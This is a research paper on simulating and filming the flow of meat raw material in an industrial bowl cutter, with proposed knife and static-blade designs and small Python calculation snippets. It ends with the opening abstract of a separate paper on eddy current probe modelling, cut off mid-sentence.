In order to determine the features and parameters of the hydrodynamics of meat raw materials in the working area of the cutter, the parameters of the movement of meat raw materials are simulated using the SolidWorks FlowSimulation software package. Schemes of the calculation areas are shown in Figs. 1, 2 and 3.
Fig. 1. Calculation area when simulating the adhesive interaction of a cutter knife with meat raw materials
Fig. 2. Calculation area when simulating the flow of meat raw materials around a cutter knife
This software package is intended for modelling three-dimensional flows of liquids and gases in technical and natural objects, as well as for visualizing these flows using computer graphics methods. Flows can be stationary or non-stationary (changing with time), and compressible, weakly compressible or incompressible. The package is based on a finite-volume method for solving the hydrodynamic equations and uses a rectangular adaptive grid with local refinement. To approximate curvilinear geometry with increased accuracy, subgrid geometry resolution technology is used. The fluid motion simulation is carried out in the following stages:

1) creation of the calculation area in CAD SolidWorks and automatic import of the model into the FlowSimulation module in the SolidWorks environment;
2) selection of the form of the mathematical model (laminar flow, non-Newtonian fluid, etc.);
Fig. 3. Calculation area when simulating the movement of meat raw materials after the cutter head
3) setting of the boundary conditions (indicating the direction of the fluid flow and the restrictive surfaces);
4) setting of the kinematic parameters of the working body and the physical and mechanical parameters of the meat raw material (rotation speeds of the knives and the cutter bowl, knife speed, liquid density, liquid viscosity, etc.);
5) setting of the computational grid (a grid with a second level of local refinement is used in the contact zones between the knife surface and the raw meat);
6) setting of the parameters of the calculation methods (number of iterations – 2,000; accuracy – 0.01; a second-order accurate scheme is used for velocity and the CGM method for pressure);
7) carrying out the calculation;
8) presentation of the calculation results in graphical form (visualization) and data storage in files.
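FlowSimulation is configured through its graphical interface rather than code, but the solver settings from stages 2 and 4–6 can be kept in one place for reproducibility. The dictionary below is only our own bookkeeping sketch of the parameters listed above; the key names are not part of any SolidWorks API.

```python
# Bookkeeping sketch of the solver settings from stages 2 and 4-6 above.
# Key names are ours; SolidWorks FlowSimulation itself is GUI-driven.
simulation_setup = {
    "mathematical_model": "laminar flow, non-Newtonian fluid",
    "grid": "rectangular adaptive, 2nd-level local refinement at knife contact",
    "iterations": 2000,
    "accuracy": 0.01,
    "velocity_scheme": "second-order accurate",
    "pressure_solver": "CGM",
}

for key, value in simulation_setup.items():
    print(f"{key}: {value}")
```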
3 Experiments

We have used high-speed video filming and thermography of the cuttering process in a Laska KR-330-2V cutter. The Laska KR-330-2V cutter is designed for preliminary and fine grinding of meat raw materials (Fig. 4). The volume of the cutter bowl is 330 l. The knife head consists of 6 sickle-shaped knives. The rotation frequency of the cutter head is 740, 1,475 or 2,950 min⁻¹. The rotation frequency of the bowl is 9 or 18 min⁻¹. The cutter is a vacuum cutter; the depth of vacuum created in the working area of the cutter is up to 0.8. The power of the electric motor driving the knife shaft is 110 kW. The features of the hydrodynamics of the raw materials in the working areas of the machines are studied by high-speed video filming of the movement of meat raw materials through the corresponding working areas. The study scheme is shown in Fig. 5.
Fig. 4. Laska KR-330-2V cutter: (a), (b) view from the side of the cutter head: 1, 2 – knives of the first cutting plane; 3, 4 – knives of the second cutting plane; 5, 6 – knives of the third cutting plane
The following equipment has been used for this:

• Sony FS700 digital video camera;
• Odyssey 7Q Convergent Design recorder;
• Sony SEL-18200 OSS lens;
• Manfrotto TR 546B tripod;
• Lilliput 969 A/O/P 9.7″ LCD video monitor.
This set of equipment allows video to be shot at quality from FullHD to 4K. During the research, video recording has been performed at a speed of 960 frames per second, with a resolution of 1920 × 216 pixels.
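To put the chosen frame rate in context, the sketch below estimates how far the raw material travels between frames at the flow speeds reported later in this paper.

```python
# Inter-frame displacement of raw meat at 960 fps, for flow speeds
# reported in the simulation results of this paper (m/s).
FPS = 960
dt = 1.0 / FPS  # ~1.04 ms between frames

for v in (36.4, 77.2, 115.0):
    print(f"{v:6.1f} m/s -> {v * dt * 1000:6.1f} mm per frame")
# Even at 960 fps the fastest layers move ~120 mm between frames,
# so frame-to-frame tracking is practical mainly for the slower flows.
```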
Fig. 5. Scheme of the experimental study of the intensity of feeding of raw materials by separate zones of the last turn of the top screw: 1 – cutter; 2 – spotlight; 3 – tripod; 4 – video camera; 5 – recorder; 6 – monitor; 7 – personal computer
Thermography of the surface of the raw materials and the equipment elements during processing has been carried out using a digital thermal imager, a personal computer and software. The ULIRvision TI384 thermal imager (infrared camera) is an optoelectronic device operating in the infrared region of the electromagnetic spectrum. The high-quality uncooled matrix of the TI384 thermal imager, with a resolution of 384 × 288 pixels, allows a clear infrared image to be obtained and the temperature of various objects of animate and inanimate nature to be measured accurately. Spectral range – 8–14 μm. Standard lens – 21° × 15°/f – 0.15 m. Sensitivity – 0.1 °C at 30 °C. Measuring range – from −20 °C to +120 °C. Measurement accuracy – ±2 °C or ±2%. The specialized IRSee software allows quantitative measurement of the temperature at any point of a digital photograph taken by the ULIRvision TI384 thermal imager.
4 Results

4.1 Establishment of the Features of the Hydrodynamics of Meat Raw Materials in the Working Area of the Cutter by Simulation

Mathematical modelling by numerical methods makes it possible to see the picture of the movement of meat raw materials during cuttering clearly and holistically. Figures 6 and 7 present the simulation results. It follows from them that the flow thrown off by knives No. 1 and No. 2 of the cutter head leaves the grinding zone at an angle of 20°–35° to the axis of rotation of the knives, depending on the frequency of their rotation. This angle corresponds to the sharpening angle of the cutter knives. Further, the flow of raw material hits the wall of the bowl and moves along the walls and the lid. The speed of the layers of raw meat depends significantly on the measurement plane: high speed values are observed in the zone swept by the tips of the knives, and smaller values in the areas adjacent to the landing part of the cutter head.

At a knife rotation frequency of 50 s⁻¹, the maximum speed of the meat raw material reaches 115 m/s, with average values of 77.2 m/s. At a knife rotation frequency of 25 s⁻¹, the maximum speed reaches 100.7 m/s, with average values of 50.6 m/s. At a knife rotation frequency of 12.5 s⁻¹, the maximum speed reaches 72 m/s, with average values of 36.4 m/s.

The pressure distribution fields correspond to the described features of the feedstock hydrodynamics. At a knife rotation frequency of 50 s⁻¹, the maximum raw meat pressure reaches 5.5 MPa, with an average value of 0.96 MPa. At 25 s⁻¹, the maximum pressure reaches 3.2 MPa, with an average value of 0.52 MPa. At 12.5 s⁻¹, the maximum pressure reaches 1.8 MPa, with an average value of 0.26 MPa.

A smaller amount of raw material is present in zone 1, which is formed by the removal of raw material from the grinding zone by the knives of the first cutting plane due to adhesion forces. The minimum amount of raw material is in zone 2; the raw material in it is thrown off by the knives in the plane of their rotation during the run-out (braking) of the cutter head. Zone 3 is characteristic in that it contains no traces of raw material. This indicates the absence of raw material rejection by the blades of knives No. 3–6, in contrast to knives No. 1 and No. 2.
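The scale of these speeds can be related to the linear speed of the knife tips, v = 2πnR. The sketch below uses a knife radius of 0.3 m, borrowed from the stress-simulation section later in this paper, so the figures are indicative only.

```python
import math

# Knife-tip linear speed v = 2*pi*n*R for the studied rotation frequencies.
# R = 0.3 m is borrowed from the stress-simulation section (Rn.max = 0.3 m).
R = 0.3  # m

for n in (12.5, 25.0, 50.0):  # rotation frequency, s^-1
    v_tip = 2.0 * math.pi * n * R
    print(f"n = {n:4.1f} s^-1 -> tip speed ~ {v_tip:5.1f} m/s")
# At 50 s^-1 this gives ~94 m/s, the same order of magnitude as the
# simulated maximum of 115 m/s for the thrown-off flow.
```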
Fig. 6. Visualization of the results of simulation of the kinematics of meat raw materials movement in the internal volume of the bowl: (a) at a knife rotation frequency of 50 s⁻¹; (b) at a knife rotation frequency of 25 s⁻¹; (c) at a knife rotation frequency of 12.5 s⁻¹
If we compare the results of the study of the heating of the surface of the meat raw materials and the structural elements with the results of the study of the hydrodynamics of the raw materials, we can draw the following conclusions. The highest temperature occurs in those layers of raw material that are thrown off by the knives of the head, pass diagonally along the surface of the bowl, rise up and are directed along the inner surface of the cover of the knife head to the zone of the middle radius of the bowl. This flow is shown in Fig. 6 by the blue middle line; it corresponds to the maximum pressure (Fig. 7). The layers of raw material thrown off by the knives of the cutter head that then move along the wall of the bowl, with friction against it, have a somewhat lower temperature. This flow is shown in Fig. 6 by the blue line located on the left. The minimum temperature is found in the layers of raw material that are lifted up by the knives of the cutter head and travel along the inner surface of the cover into the part of the bowl that rotates at the minimum radius. This flow is shown in Fig. 6 by the blue line located on the right, at the central cone of the bowl.
Fig. 7. Visualization of the simulated pressure distribution of raw meat in the horizontal plane of the bowl: (a) at a knife rotation frequency of 50 s⁻¹; (b) at a knife rotation frequency of 25 s⁻¹; (c) at a knife rotation frequency of 12.5 s⁻¹
The photograph presented in Fig. 8, (a) confirms the simulation results. It can be seen that the largest amount of raw material is in zone 4 (formed by the rejection of raw material by the blades of knives No. 1 and No. 2). The study of the heating of the surface of the meat raw materials and the structural elements gives the following results (Fig. 8, (b)). The surface temperature tsur of the outer surface of the cutter head cover takes on the following values: in the extreme right cylindrical part, tsur = 6.5 °C; in the middle of the cylindrical part, tsur = 6.4 °C; in the extreme left cylindrical part, tsur = 5.0 °C; in the right conical part, tsur = 4.5 °C; in the left conical part, tsur = 2.0 °C. The raw material under the cover has a temperature from tsur = −4.3 °C to tsur = 0.6 °C. We have developed a method for coordinating the parameters of the processes of supplying and grinding meat raw materials in order to increase the productivity of the cutter, improve the quality of processing of raw materials in it, and reduce the energy consumption of the cuttering process.
Fig. 8. Photographic recording of the distribution of raw materials on the surface of the knife head cover (a) and the temperature fields of the raw materials and the outer surface of the knife head cover (b): 1 – raw material removed by the knives of the first cutting plane from the grinding zone due to adhesion; 2 – raw material thrown off by the knives in the plane of their rotation when braking the knife head; 3 – area with no traces of raw material; 4 – raw material thrown off by the knife blades
The solution of the above problematic task is based on the concept of improving technological equipment previously developed by the author. According to its provisions, an effective solution is one in which a new function is implemented in the system with the least expenditure of material, energy and funds, through the use of structural elements or force fields already existing in the system. The most rational case is one in which a negative factor begins to bring a positive result. Here, the available force field should be understood as the high kinetic energy of the pieces of raw material after they have been crushed by one of the head knives. It is proposed to use this energy for grinding the meat raw material on fixed (static) cutting elements (knives) installed in the direction of movement of the meat raw material after grinding by one of the knives of the cutter head. A schematic diagram of the proposed device is shown in Fig. 9.

A static-type device for increasing the performance of the cutter consists of at least one static knife 1, which is placed after the cutter head 2 in the direction of rotation of the bowl 3. Each static knife 1 is located essentially perpendicular to the sharpened surfaces 4 of the knives 5 of the rotating cutter head 2 as they move in the bowl 3. The device is additionally equipped with at least one holder 6, a housing 7, a transmission mechanism 8 and a drive 9. Each static knife 1 is fixed in the housing 7 by means of a holder 6 with the possibility of rotation around a vertical axis. The static knives 1 are rotated by the drive 9 through the transmission mechanism 8; the operation of the drive 9 is subordinated to the cutter control system. When the cutter head rotates, the head knives intensively throw off the cut layers of meat raw material in a direction close to perpendicular to the knife sharpening surfaces, i.e. forward and towards the bowl wall in the direction of its rotation.
The cut layers of raw meat collide with the knives 1 and, owing to their high kinetic energy, are crushed on them (the speed of the layers of raw meat is close to the linear speed of the knife tips, 70–160 m/s). This provides additional intensive grinding of the meat raw material without extra energy input and without harmful excess heating, which leads to an increase in the productivity of the cutter while reducing its energy consumption and improving the quality of raw material processing. Making the static knives 1 rotatable makes it possible to adapt the operating modes of the device to the required grinding ability of the cutter in the manufacture of minced meat for various types of sausages, as well as within one cycle: at the beginning, when grinding lumpy meat raw materials, and at the end, during the final emulsification of structureless minced meat.
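The energy scale involved here can be estimated from first principles: if a layer moving at speed v is brought to rest and all of its kinetic energy dissipates as heat, the temperature rise is ΔT = v²/(2c). The sketch below assumes a specific heat capacity of roughly 3500 J/(kg·K) for minced meat; this value is our assumption, not a figure from the paper.

```python
# Upper-bound estimate of heating when a layer of raw meat moving at
# speed v is decelerated and its kinetic energy dissipates as heat.
C_MEAT = 3500.0  # J/(kg*K), assumed specific heat of minced meat

for v in (70.0, 115.0, 160.0):       # m/s, speed range quoted above
    dT = v**2 / (2.0 * C_MEAT)
    print(f"v = {v:5.1f} m/s -> dT <= {dT:4.2f} K per impact")
# Roughly 0.7-3.7 K per impact: repeated throwing and braking of the
# raw material is therefore a plausible source of minced-meat heating.
```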
Fig. 9. Schematic diagram of a device of a static type to increase the specific productivity of the cutter: (a) diagram of the device; (b), (c), (d) device design
So, when grinding minced meat for raw smoked sausages, as well as at the beginning of cutting lumpy meat raw materials, the static knives 1 are located along the direction of flight of the layers of meat raw material (Fig. 10, (a)). This ensures grinding of the raw meat by cutting on the cutting edges of the knives 1. When grinding minced meat for structureless sausages (boiled sausages, sausages, etc.), especially at the end of the cuttering cycle (when emulsifying the minced meat), the knives 1 are turned across the direction of flight of the layers of meat raw material (Fig. 10, (b)), which promotes grinding of the raw meat by dispersion upon impact. When the cutter bowl rotates without rotation of the cutter head knives, the knives 1 of the device are aligned with the direction of rotation of the cutter bowl (Fig. 10, (c)).
Fig. 10. The position of the elements of the static type device to improve the performance of the cutter under different cutting conditions
The transmission mechanism 8 can be made in the form of a rack and pinion that rotates gears on the holders 6, in the form of a worm shaft that rotates worm wheels on the holders 6, or in the form of a drive rod and a system of rotary levers that turn the holders 6, etc. The drive 9 can be made in the form of a stepper motor with or without a gearbox, in the form of a hydraulic or pneumatic cylinder, etc. As a result, when using this device, it becomes possible to turn a negative factor into positive effects, namely, to increase the productivity of the cutter, reduce the energy consumption of the cuttering process and reduce the heating of the raw material during cuttering.
Industrial tests of the developed device make it possible to establish that, when it is used, the productivity of the cutter increases by 45% without any increase in energy consumption, and the minced meat temperature is reduced by 3 °C. In general, we can speak of a reduction in the energy consumption of the cutter per cycle of processing meat raw materials.

4.2 Simulation of the Hydrodynamics of Raw Materials in the Flow Around a Knife

In order to make reasonable and effective design decisions to improve cutter knives, in particular to improve the quality of processing of raw materials and to increase the strength of the knife, it is necessary to have a clear understanding of the features of the contact of the knife with the raw material that flows around it during cuttering. In order to determine these features, numerical simulation of the movement of the feedstock around the cross section of the cutter knife is carried out. To simulate the movement of raw meat at the stage of its fine grinding in the cutter, the following initial data are used (Figs. 11, 12, 13 and 14): the speed of movement of the liquid is set in the range v = 20…120 m/s; the fluid motion mode is laminar; the liquid density is 1050 kg/m³; the liquid viscosity ranges from η = 30 Pa·s (as for emulsified meat raw material at the final stage of the cutting process) to η = 700 Pa·s (as for lumpy meat raw material at the beginning of the cutting process). The sharpening angle of the knife blade is 14° (the average value of the kinematic cutting angle of knives used in practice).

As follows from the data obtained, when the raw material flows around the knife, its direction of movement changes significantly: after moving along the sharpened face of the blade, the flow continues onward, bending around the upper side surface of the knife, and does not contact the upper rear part of the knife. The part of the flow that goes around the knife from below also deviates significantly from its initial direction after contact with the cutting edge of the blade. As a result, the distribution of flow velocity and pressure values in the zones where the raw material contacts the knife blade and its body is determined.

Figure 11 illustrates the location of the velocity vectors for an emulsified minced meat flow for one particular simulation case (flow viscosity η = 30 Pa·s and flow velocity v = 125 m/s). This mode of movement of the raw material is chosen for illustration because a viscosity of 30 Pa·s corresponds to the final stage of cuttering (minced meat with a fine degree of grinding), and the minimum viscosity of the raw material corresponds to its minimum deviation from the initial direction of movement when flowing around the knife. The pressure values in the flow of meat raw materials are given in Figs. 12, 13 and 14. Figure 12 illustrates the true value of the pressure in the flow around the knife in the form of a fill. For clarity, the visualization of its values is also given in Fig. 13, which shows the pressure in the flow around the knife in the form of a fill, but with the maximum displayed pressure value limited to 10 Pa, which is done for clarity of the pressure distribution above and below the knife.
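These settings imply a strongly viscous regime. A quick Reynolds-number estimate shows why the laminar flow model is justified; the knife thickness of 5 mm quoted later in the paper is used here as the characteristic length, which is our own choice.

```python
# Reynolds-number estimate Re = rho * v * L / eta for the simulated regimes.
# L = 0.005 m (knife thickness, quoted later in the paper) is our choice
# of characteristic length; other values are from the simulation setup above.
RHO = 1050.0   # kg/m^3
L = 0.005      # m

for eta in (30.0, 700.0):          # Pa*s
    for v in (20.0, 120.0):        # m/s
        re = RHO * v * L / eta
        print(f"eta = {eta:5.0f} Pa*s, v = {v:5.0f} m/s -> Re = {re:6.1f}")
# Re stays well below ~10^3 even in the fastest, least viscous case,
# so the laminar flow model assumed in the setup is reasonable.
```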
Fig. 11. Distribution of the flow velocity of raw meat when flowing around the cross section of the knife with a flow viscosity η = 30 Pa·s and its speed v = 125 m/s
Fig. 12. Hydrodynamic pressure in the flow of raw meat when flowing around a knife, Pa (viscosity – 30 Pa·s, cutting speed – 125 m/s; visualization in the form of filling)
The layers of raw meat that are cut off by the knife in this case move at a speed in the range of 76–89 m/s. The boundary layers of the raw material move at a speed that falls to zero within a distance of up to 2 mm from the surface of the knife. The maximum pressure occurs in the zone of the cutting edge of the knife, where it reaches 10.5 MPa; around the cutting edge the pressure reaches 5.4 MPa and then decreases to 2.8 MPa. Above the upper side surface of the knife and below it, the pressure is negative. Above the upper side surface of the knife near its blade, the pressure decreases to −1.1 MPa, and further along the width of the knife it reaches −0.68…−0.46 MPa. The negative pressure values on the upper part of the knife, together with the minimum speeds of the raw meat in this zone, indicate the absence of raw meat there. That is, as mentioned above, there is no contact of the meat raw material with the upper side surface of the knife, in particular with its back part. This is confirmed by Fig. 14. Figure 14, a presents the distribution of pressure above and below the knife section in the form of a two-dimensional graph. In this case, the ordinate axis, relative to which the pressure in the flow is determined, is located horizontally, and the abscissa axis is vertical. The values located to the left of the vertical abscissa axis are positive (under the knife), and the values to the right of it are negative (above the knife).
Fig. 13. Hydrodynamic pressure in the flow of meat raw materials when flowing around a knife, Pa, the maximum pressure value is limited to 10 Pa (viscosity – 30 Pa·s, cutting speed – 125 m/s; visualization in the form of filling)
This indicates that the raw meat does not contact the upper surface of the knife. The minimum pressure value in the section under consideration (above the knife) reaches −0.75 MPa. Figure 14, b presents the distribution of pressure above the knife section along its width in the form of a two-dimensional graph. In this case, the ordinate axis, relative to which the pressure in the flow is determined, is located vertically, and the abscissa axis is horizontal. This graph makes it possible to evaluate the change in pressure over the knife along its cross section. The minimum pressure value is observed at the blade (near its inclined surface) and reaches −0.81 MPa.

In order to confirm the simulation results, high-speed video recording of the process of grinding meat raw materials with cutter knives is used. Figure 15 illustrates the results of determining the nature of the flow around the knife using high-speed video. It can be seen from Fig. 15 that the layer of raw material cut off by knife No. 1 moves at a significant angle to the cut of the layer of raw material supplied by the cutter bowl. The cut layer of raw material does not contact the corresponding side surface of the knife, which fully corresponds to the results of the numerical simulation. The flow patterns around cutter knives according to previously known ideas and according to the established research results are shown in more detail in Fig. 16.

The established new information about the hydrodynamics of meat raw materials during cutting makes it possible to propose a new way to increase the strength of knives: a differentiated increase in their thickness (Fig. 17, (a), (b)). This ensures the simultaneous fulfillment of two important requirements: low heating of the raw material, owing to the small thickness of the blade in the zone of contact with the meat raw material, and higher knife strength, owing to the increased thickness of the back, most stressed part of the knife, which is not in contact with the raw material. Taking into account the developed design of the knife (Fig. 17, (a), (b)) and the recommendations for reducing the width of the knife [8, 9], such a design can be expected to simultaneously provide an increase in cutter productivity, a decrease in raw material heating and an increase in knife strength. Combining both developed technical solutions, we propose the following design of the cutter knife (Fig. 18).
Fig. 14. Hydrodynamic pressure in the flow of raw meat when flowing around a knife, Pa (viscosity – 30 Pa·s, cutting speed – 125 m/s; visualization in the form of a two-dimensional graph)
Fig. 15. The nature of the flow around the knife with meat raw materials during its cutting: (a) at the beginning of cutting a piece of meat; (b) at the end of the process of cutting a piece of meat
Modelling of Hydrodynamics of Meat Raw Materials
403
Fig. 16. Schemes of raw material flow around cutter knives: (a) according to previously known ideas; (b) according to established research results
Fig. 17. The scheme of work and types of cross sections of the knives of the developed design (Rn.max. = 0.3 m): (a) scheme of the knife; (b) knife cross-section type I; (c) knife cross-section type II
The knife consists of a plate 1 having a blade 2 with a cutting edge 3 and a seating surface 4 for fixing in the cutter head. The plate has lateral sides 5 and 6 and a back side 7. The blade 2 has a sharpening 8. The height of the knife cross section h2, measured in the area between the sides 5 and 6, is greater than the cross-section height h1, measured in the area where the blade 2 joins the sides 5 and 6. The cross-section height h2 is variable: minimal on the side of the blade 2 and maximal on the side of the back side 7. On the lateral side 5, over which a layer of raw material flows when fed by the cutter bowl, a recess 9 with a depth of δ is made. The recess 9 extends along the surface of the lateral side 5 from a border located at a distance l from the cutting edge 3 to the back side 7 of the plate. The distance l can take values from the maximum lmax on the side of the seating surfaces of the cutter knife to the minimum lmin on the sections of the knife farthest from the axis of rotation. The depth of the recess 9 can take values from the minimum δmin at the cutting edge 3 to the maximum δmax at the back side 7 of the cutter knife (Fig. 18, (d)),
which makes it possible to increase the strength of the knife without compromising its efficiency. The intensity of heat release can be estimated from the friction energy dissipation in the raw material, determined by numerical simulation (Fig. 19). In the area more distant from the axis of rotation of the knife, a higher value of energy dissipation is observed. This indicates a greater contribution of this part of the knife to the total heat generation during cutting compared with the part adjacent to the landing part, despite the significantly smaller friction surface area of this more distant part. The difference is explained by the significantly higher linear speeds of these parts of the knife (the values differ by a factor of 2–3).
Fig. 18. Cutter knife with reduced contact area with raw materials: 1 – plate; 2 – blade; 3 – cutting edge; 4 – landing surfaces; 5, 6 – lateral sides; 7 – back side; 8 – sharpening; 9 – recess; (a) diagram of the operation of a knife with a recess; (b) general view of the knife; (c) cross section of the knife with recess 9 of constant depth; (d) cross section of the knife with recess 9 of variable depth
When a knife of the standard design rotates, the energy dissipation is 10⁵ units when measured at a distance of 2 mm from the knife surface (Fig. 19, (a)), while for a knife of the developed design the dissipation in the zone of the recess decreases to 5.5·10⁴ units, i.e. almost half as much as for the standard design (Fig. 19, (b)). When measuring the energy dissipation at a distance of 5 mm from the surface of the knife, its maximum value for the standard design again reaches 10⁵ units (Fig. 19, (c)), while for the developed design the dissipation in the recess zone decreases to 1.5·10⁴ units, which is almost an order of magnitude less than for the standard design (Fig. 19, (d)).
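The quoted reductions can be verified directly from these dissipation values; the two-line sketch below uses the relative units read from Fig. 19.

```python
# Reduction factors in friction energy dissipation for the new knife design,
# using the relative units quoted from Fig. 19.
standard = 1.0e5
new_at_2mm, new_at_5mm = 5.5e4, 1.5e4

print(f"{standard / new_at_2mm:.1f}x lower at 2 mm")  # ~1.8x ("almost half")
print(f"{standard / new_at_5mm:.1f}x lower at 5 mm")  # ~6.7x ("an order of magnitude")
```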
The simulation results show that the use of the new knife design can significantly reduce the heating intensity and the temperature gradient in the raw material, by 30% to 6.7 times depending on the depth of the layer under consideration (Fig. 19, (b) and Fig. 19, (d)). And since the heating of the raw material is mainly due to energy dissipation caused by the friction of the knives against the raw material, a decrease in the heating of the minced meat and a decrease in the energy consumption of the cutter drive can be expected.
Fig. 19. Distribution of energy dissipation in raw meat during cutting: (a) at the distance of 2 mm from the surface of a knife of a standard design; (b) at the distance of 2 mm from the surface of the knife of a new design type II; (c) at the distance of 5 mm from the surface of a knife of a standard design; (d) at the distance of 5 mm from the surface of the knife of a new design type II
To check that the knife of the developed design has sufficient strength, numerical simulation of the stress-strain state of the knives of the developed designs is carried out. In the modelling, the value of the frontal pressure on the blade is determined for a knife with a radius of 300 mm rotating at a frequency of 4500 min⁻¹. It is set in the range from 0.53 MPa to 2.9 MPa along the length of the blade. The pressure on the side surface of the knife is assumed to be 6 kPa; the thickness of the knife is 5 mm. An alloy steel with a yield strength of 620.4 MPa is chosen as the model material.
The results of simulation (the value of stresses σmax in accordance with Fig. 20 and the safety factor Kz.m.) are shown in Table 1, and their visualization is shown in Fig. 21.
Fig. 20. Numbers of points of a knife at measurement of stresses in it

Table 1. Values of stresses in knives of different structure

No of knife point         Knives of variable thickness, type I     Knives of variable thickness, type II
(according to Fig. 20)    Stress σmax, MPa    Strength margin      Stress σmax, MPa    Strength margin
1                         50.8                12.2                 55.6                11.2
2                         50.3                12.3                 54.1                11.5
3                         26.9                23.1                 30.6                20.3
4                         74.2                8.4                  76.2                8.1
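The strength margins Kz.m. in Table 1 are consistent with the ratio of the declared yield strength to the simulated stresses; a minimal Python check of this relationship (values taken from the text and Table 1):

```python
yield_strength = 620.4  # MPa, yield strength of the model material

stresses = {
    "type I": [50.8, 50.3, 26.9, 74.2],   # sigma_max at points 1-4, MPa
    "type II": [55.6, 54.1, 30.6, 76.2],
}
for design, sigma_max in stresses.items():
    margins = [round(yield_strength / s, 1) for s in sigma_max]
    print(design, margins)
# type I:  [12.2, 12.3, 23.1, 8.4]  -> matches Table 1
# type II: [11.2, 11.5, 20.3, 8.1]  -> matches Table 1
```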
Based on the simulation results, it is found that the proposed knife designs make it possible to significantly increase knife strength in the most stressed areas, in which the destruction of knives most often occurs. The design of the type II knife, along with a decrease in the heating of raw material, makes it possible to increase its strength at points 3 and 4 by 34% and 24.5%, respectively. In addition, it becomes possible to reduce the stress at points 3 and 4, compared with a standard blade, by 10.1% and 17.4%, respectively. This proves the rationality of the decisions made in the work and the prospects for using knives of the developed designs, which cause less heating of minced meat during emulsification and have increased strength, including when processing lumpy and frozen raw materials. Industrial tests of the developed knife design make it possible to establish that its use increases the productivity of the cutter by 15%, decreases the minced meat temperature by 1.5 °C, and reduces energy costs by 7%.
5 Discussion

One of the reasons for the heating of raw material during cuttering is its intense friction on the surfaces of the bowl and the cover of the cutter head due to the high kinetic energy the raw material acquires after being thrown off by the knives of the first cutting plane. This fact is important in the search for effective ways to reduce the heating of raw materials and increase the productivity of cutters.
Fig. 21. Visualization of the stress state of knives of different designs (stress, MPa): (a) type I (upper side); (b) type I (lower side); (c) type II (upper side); (d) type II (lower side)
The obtained simulation results are confirmed by high-speed video recording data. It follows from them that, when cutting at the average and maximum speeds of the knives, the raw meat is thrown out of the grinding zone at a high speed, reaching 70–115 m/s, by knives No. 1 and No. 2 of the cutter head at an angle of 20°–35° to the planes of rotation of the knives. As a result, the raw material acquires high kinetic energy, which, according to the known laws of physics, turns into heat during the subsequent braking of the cut layers of raw meat against the bowl wall, the bowl lid and the cutter head cover. These characteristic features of the hydrodynamics of meat raw materials in the working area of the cutter lead directly to three significant negative phenomena:

• a decrease in the productivity of the cutter due to the removal of meat raw materials from the grinding zone;
• excessively high unproductive energy consumption for the cutting process;
• intensive heating of meat raw materials, due to which, in order to avoid protein denaturation, flake ice or ice water specially produced on the appropriate equipment has to be added to the meat raw materials.

According to the results of studies of the hydrodynamics of meat raw materials, it follows that when flowing around the knife profile, both at the beginning of cutting (at a flow viscosity of 700 Pa·s) and at the end of the cutting process (at a flow viscosity of 30 Pa·s), the following phenomenon is observed. When flowing around the upper part of the knife profile, the flow of raw material, after moving along the sharpening of the blade, continues to move around the upper horizontal side of the knife without making contact. This phenomenon is observed for the entire range of linear cutting speeds used in practice (20…180 m/s). The results obtained radically change the idea of the contact features of cutter knives with raw meat, which may be the basis for further improvement of cutter knives and cutter heads.

The results of mathematical modelling of the process of ejecting minced meat with knives from the cutting zone complement the experimental work of other researchers and allow the speed and direction of movement of the minced meat layers to be determined quantitatively. The results of mathematical modelling of the meat mince flowing around the knives of the cutter are new and presented for the first time. They serve as the basis for the development of new cutter knife designs.

The results presented in the article correlate well with experimental data in terms of the direction in which minced meat is thrown from the cutter head and the process of the minced meat flowing around the knife. However, it would be expedient to develop a generalized mathematical model that would allow determining all the necessary features of the hydrodynamics of minced meat in a cutter, including the dissipation of turbulent energy and the ejection of minced meat from the cutting area by the knives upwards due to frictional forces. Such a mathematical model would be very useful for further scientific research, but it will obviously require much more powerful computer hardware, which may cause difficulties in its practical implementation. It would also be appropriate to simulate the operation of the developed device for increasing the productivity of the cutter in order to determine the most effective location of the blades, the orientation of the blade sharpening, etc. All these problems can be solved in further research.
6 Conclusions

This article presents the results of research whose use will increase the productivity of bowl cutters and their reliability in operation. It is the use of mathematical modelling with the SolidWorks software package, in particular its Flow Simulation and Simulation modules, that allows us to obtain data that would be too difficult to obtain purely by experiment. The obtained results make it possible to propose new ways of improving bowl cutters. The scientific novelty of the obtained results is as follows.
For the first time, it is established that at the stage of emulsification of meat raw materials, the knife of the bowl cutter does not contact the raw material with one of its side surfaces. When flowing around the upper part of the knife profile, the flow of raw material, after moving along the blade sharpening, continues to move around the upper horizontal side of the knife without making contact. This phenomenon is observed for the entire range of linear cutting speeds used in practice (20…180 m/s). The obtained results significantly expand the search for effective ways to increase the strength of bowl cutter knives.

An understanding of the peculiarities of the interaction of bowl cutter knives with raw materials has been developed. When cutting at the average and maximum speeds of the knives, raw meat is thrown out of the grinding zone at a high speed, reaching 70–115 m/s, by knives No. 1 and No. 2 of the cutter head at an angle of 20°–35° to the planes of rotation of the knives. As a result, the raw material acquires high kinetic energy, which is further converted into heat during the subsequent braking of the cut layers of raw meat against the bowl wall, the bowl lid and the cutter head cover.

The practical significance of the obtained results is that, on their basis, a new type of device for increasing the productivity of the bowl cutter and two new knife designs have been developed. Their use makes it possible to increase the productivity of the cutter by 60% and reduce the temperature of minced meat by 4.5 °C. At the same time, a significant reduction in the energy consumption of the bowl cutter per cycle of processing raw meat is noted when the developed device for increasing the productivity of the bowl cutter is used.

Further research should be devoted to improving the developed device for increasing the productivity of the bowl cutter by adapting it to work with different raw materials. Also, taking into account the peculiarities of the hydrodynamics of meat raw materials in the bowl cutter, it is advisable to develop new prefabricated knife designs that would have significantly higher strength, ease of use and reduced cost.
Computer Simulation of the Process of Profiles Measuring of Objects Electrophysical Parameters by Surface Eddy Current Probes Volodymyr Halchenko, Ruslana Trembovetska(B) , Constantine Bazilo, and Natalia Tychkova Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The created computer model of the process of measuring continuously changing profiles of electrical conductivity and magnetic permeability in objects with a surface eddy current probe is considered as a tool for developing a computationally efficient metamodel on artificial neural networks, necessary for solving the inverse electrodynamic problem. This computer model is also used to simulate the measurement processes in various frequency modes of excitation of eddy currents in magnetic and non-magnetic test objects, in order to study the sensitivity of the method in distinguishing a series of slightly different profiles and to determine the optimal frequency ranges that provide the highest possible levels of the output signal of the surface probe. The reliability of the computer model is verified on simple test cases in which the near-surface layer is represented by a one- and two-layer approximation. It is assumed that in these layers the values of the electrical parameters are unchanged. It is shown that the results calculated with the created computer model, oriented to a conditionally multilayer representation of test objects, coincide with acceptable accuracy with the results obtained for the simple cases for which analytical dependences for calculating the output signal of eddy current probes exist. As a result of this comparison, the adequacy of the created software is proved. A series of model experiments for test objects made of magnetic and non-magnetic materials has been carried out, 